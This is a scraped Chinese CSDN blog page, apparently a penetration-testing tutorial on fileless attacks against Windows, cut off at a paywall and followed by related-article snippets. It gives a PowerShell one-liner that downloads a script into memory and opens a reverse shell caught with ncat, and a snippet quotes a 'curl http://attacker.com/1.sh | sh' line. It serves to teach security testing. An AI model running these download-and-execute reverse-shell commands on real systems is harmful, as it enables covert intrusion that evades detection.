渗透测试之无文件渗透简单使用-windows

最新推荐文章于 2022-10-29 10:09:25 发布
最新推荐文章于 2022-10-29 10:09:25 发布
阅读量691 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Testfan_zhou/article/details/92580968
版权
本文介绍了无文件渗透测试的工作原理,它不将文件复制到硬盘,而是将payload注入内存执行,使得恶意软件难以被追踪。在Windows系统中,通过远程加载PowerShell脚本到内存反弹shell,利用命令`powershell IEX (New-Object Net.WebClient).DownloadString('url');Invoke-PowerShellTcp -Reverse -IPAddress ip -port port`实现。同时,使用ncat接收反弹的会话。通过检查powershell进程和文件是否存在验证无文件执行。
摘要由CSDN通过智能技术生成

无文件渗透测试工作原理:无文件恶意程序最初是由卡巴斯基在2014年发现的,一直不算是什么主流的攻击方式,直到此次事件的发生。说起来无文件恶意程序并不会为了执行而将文件或文件夹复制到硬盘上,反而是将payloads直接注入正在运行程序的内存,导致恶意软件直接在系统内存中执行,也让专家很难在系统重启之后找到此恶意软件的踪迹。

在日常的渗透测试中,如果使用无文件渗透,那么也同样可以保证在执行恶意测试程序时没有任何的文件落地,直接加载到内存中执行,本文分为两篇,将分别针对windows和linux系统分别简单介绍下如何进行无文件渗透测试实战。

首先我们要确定下我们在什么情况下会到使用无文件渗透的这个地步:

  1. 存在命令执行相关漏洞,可直接执行系统命令

  2. 通过其他漏洞已经进入测试目标并且可以执行一些系统命令

实际上在理解了命令执行的原理并且保证漏洞可以执行任意系统命令后,我们可以直接在命令行的操作模拟命令执行漏洞利用的操作,所以不要介意为什么说是利用漏洞来进行无文件渗透测试但图里面确实直接在命令行的操作。

在windows下,一般通过远程加载powershell脚本来进行,接下来测试加载某ps1脚本至内存来反弹系统shell(用户会话),测试脚本名为Invoke-PowerShellTcp.ps1,脚本内容不给出,仅做无文件渗透测试样例使用,具体利用方式如下:
在这里插入图片描述powershell IEX (New-Object Net.WebClient).DownloadString(‘<

最低0.47元/天 解锁文章
码同学软件测试
关注
“无文件”攻击方式渗透实验
weixin_33972649的博客
03-16 444
拓扑设计   拓扑介绍 其中192.168.1.0/24模拟的是公网的环境 172.21.132.0/24模拟的是企业内网的环境 边界web服务器双网卡(公网的:192.168.1.110,和内网的172.21.132.110),而且为了最基本的安全保障,web边界服务器设置了防火墙,此防火墙对外网只开放80,81,443端口,对内网开放所有端口,上面还装有杀毒软件。 内网还布置若干台web服...
windows反弹_渗透测试之无文件渗透简单使用windows
weixin_32285045的博客
01-30 168
有头发且有趣的码农万里挑一~125码农 | 有故事的程序员无文件渗透测试工作原理:无文件恶意程序最初是由卡巴斯基在2014年发现的,一直不算是什么主流的攻击方式,直到此次事件的发生。说起来无文件恶意程序并不会为了执行而将文件文件夹复制到硬盘上,反而是将payloads直接注入正在运行程序的内存,导致恶意软件直接在系统内存中执行,也让专家很难在系统重启之后找到此恶意软件的踪迹。在日常的...
文件渗透实验
一个码农的笔记
03-09 4382
文件渗透实验—这是60字节webshell的杂技前几天看了一个文章《全球上百家银行和金融机构感染了一种“无文件”恶意程序,几乎无法检测》 觉得powershell很是神奇,自己希望亲手实验一下,以最大程度还原“无文件”攻击方式拓扑设计 拓扑介绍: 其中192.168.1.0/24模拟的是公网的环境 172.21.132.0/24模拟的是企业内网的环境 边界web服务器双网卡(公网的:192.1
linux 木马 目录下没有文件,后渗透系列之下载文件(Linux篇)
weixin_30667487的博客
04-30 442
渗透是指已对目标服务器有shell交互后的操作,通常包含权限维持、提权、内网渗透、一键拿域控。本篇文章主要讲解后渗透准备工作——下载文件的方式,文件可以是木马、工具等等(任意文件皆可),为了方便演示,文件为test.txt。准备工作首先需要架设服务器,将要下载的文件部署在服务器上,笔者用的服务器为Kali Linux架设,ip地址是192.168.8.111,被控端是Centos,ip地址是19...
Linux无文件渗透执行elf方式
SWX230162的博客
10-29 773
比如说你使用了一个开源组件,开源组件以bin的形式提供,但是你并不想直接./bin去运行它,而是想把开源bin直接集成到自己的代码中,这样对外相当于隐藏了开源bin,直接提供你自身代码的bin。这种场景可以简单应用到Linux elf in-memory execution这种方式。这个头文件中有两个变量bin, bin_len。bin中保存的就是bin的十六进制数据,bin_len是bin的data长度。将你依赖的开源bin通过xxd -i生成头文件。将头文件写到刚才创建的mem_fd中。
【推荐】渗透测试工程师(CISP-PTE)认证培训课件资料合集(18份).zip
11-29
推荐,注册信息安全专业人员渗透测试工程师(CISP-PTE)认证培训课件资料合集,共18份。 001-Linux操作系统安全V2.0.pptx 002-Windows操作系统安全V2.0.pptx 003-数据库安全.pptx 004-Web安全基础0 - 介绍.pptx 005...
渗透测试工具-Cobalt Strike
最新发布
03-21
**Cobalt Strike:渗透测试的强大武器** Cobalt Strike(简称CS)是一款广泛应用于网络安全领域的高级渗透测试工具,主要用于模拟攻击者的行为,帮助安全专业人员检测和评估组织的防御能力。这款工具以其强大的功能...
E017-渗透测试常用工具-使用Beef对客户端浏览器进行劫持.pdf
12-02
首先,我们需要准备一个渗透测试环境,包括Kali Linux(作为渗透机)和多个Windows服务器及客户端。确保所有机器之间的网络连接畅通,可以通过`ifconfig`(在Linux中)和`ipconfig`(在Windows中)命令获取各自的IP...
中职网络空间安全Windows操作系统渗透测试解题
06-05
通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景中的当前最高账户管理...通过本地PC中渗透测试平台Kali对服务器场景PYsystem4进行渗透测试,将该场景中回收站内文件的文档内容作为FLAG提交。
web渗透windows及linux基础
qq_41899253的博客
03-05 178
Windows: netstat -a 查看开启端口,常用netstat -an netstat -v 查看正在进行的工作 netstat -n 查看端口的网络连接情况 net password 密码...
新型“无文件”+代码注入勒索软件SOREBRECT现江湖
weixin_34389926的博客
07-04 279
Trend Micro安全研究人员警告称,新浮现一款名为“SOREBRECT”的勒索软件,其结合了“无文件”攻击和代码注入两种攻击方式。 攻击方式 Trend Micro公司表示,几个月前,SOREBRECT设法感染中东组织机构的网络和系统被发现。这款勒索软件具备不寻常的加密技术,滥用PsExec公用程序利用代码注入,同时还注重隐身。 SOREBREC...
linux无文件渗透执行elf
whatday的专栏
08-13 1321
01—简介 在进行Linux系统的攻击应急时,大家可能会查看pid以及/proc相关信息,比如通过/proc/$pid/cmdline查看某个可疑进程的启动命令,通过/proc/$pid/exe抓样本等,但是攻击者是否会通过某种类似于curl http://attacker.com/1.sh | sh的方法来执行elf二进制文件呢?最近看了一篇@MagisterQuis写的文章h...
零基础Web安全渗透工程师精品就业班
07-14
1、熟练掌握Kali操作系统的使用2、熟练掌握metasploit框架进行渗透测试3、熟练掌握SQL注入的原理以及绕过技巧。4、每章节课时都有2小时,建议每天学习1章节,然后充分练习、实践、总结。
利用WinRM实现内网无文件落地攻击
UKK
06-18 889
利用WinRM实现内网无文件落地攻击 http://www.ifind.cc/view/220
Windows-server-2008 搭建渗透测试靶机
zhq199528的博客
10-03 3031
** Windows-server-2008 搭建靶机 ** 首先,为了方便后面的操作,我们要在开机前进行文件共享,使我们要用的文件夹共享到虚拟机上 开启虚拟机(因为我这是之前就已经的做好的一个,然后进行了一下克隆,所以很多步骤在这里就不显示了,如要了解可去我的文章库里进行寻找) 对xampp应用程序进行一些配置更改,让xampp使用管理员身份运行 安装gVim,后面的配置文件都要用vim进行编辑 打开xampp,更改配置 (使用gVim打开xampp的配置文件,并进行编辑) (开启Apa
文件攻击的种类
摔不死的笨鸟的博客
12-01 2055
在安全领域,无文件攻击意味着极其严重的威胁。“无文件”一词,是在探讨绕过恶意文件检测技术的方法时诞生的术语。“无文件攻击”只是一种攻击策略,其出发点就是避免将恶意文件放在磁盘上,以逃避传统安全软件的检测。 本知识领域牵涉到病毒逆向分析和渗透测试两大版块。 无文件攻击的种类 病毒名称 漏洞类型 CVE编号 漏洞位置 Office漏洞 CVE-2017-0199 内嵌OLE2LINK对象 Office漏洞 CVE-2017-11882(噩梦公式一代) 公式编辑器EQNEDT32.EXE
使用Metasploit渗透攻击windows系统(一)
weixin_30633507的博客
01-27 931
攻击机:kaili ip:192.168.80.157 目标机:win7 IP:192.168.80.158 这里用两种方法去创建meterpreter会话: 1)利用kali中的msfvenom生成木马,在目标机上运行,具体步骤如下: 常用参数: -p选择攻击的payload-l载荷列表-f生成的文件格式-e编码方式-i编码次数-b在生成的程序中避...
渗透测试:metasploit+ms-17-010+Windows2008r2
小梁的博客
09-01 2392
渗透测试:metasploit+ms-17-010+Windows2008r2 工具 1 vbox 2 kali 3 win2008r2 最终效果 创建一个属于Administrators组的用户admin,并使用admin账户进入系统。 实现步骤 1 使用netdiscover 探测局域网内的主机,目的是发现需要渗透的主机 现在我们发现了3台主机。 2 使用nmap进行扫描 nmap基本功能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值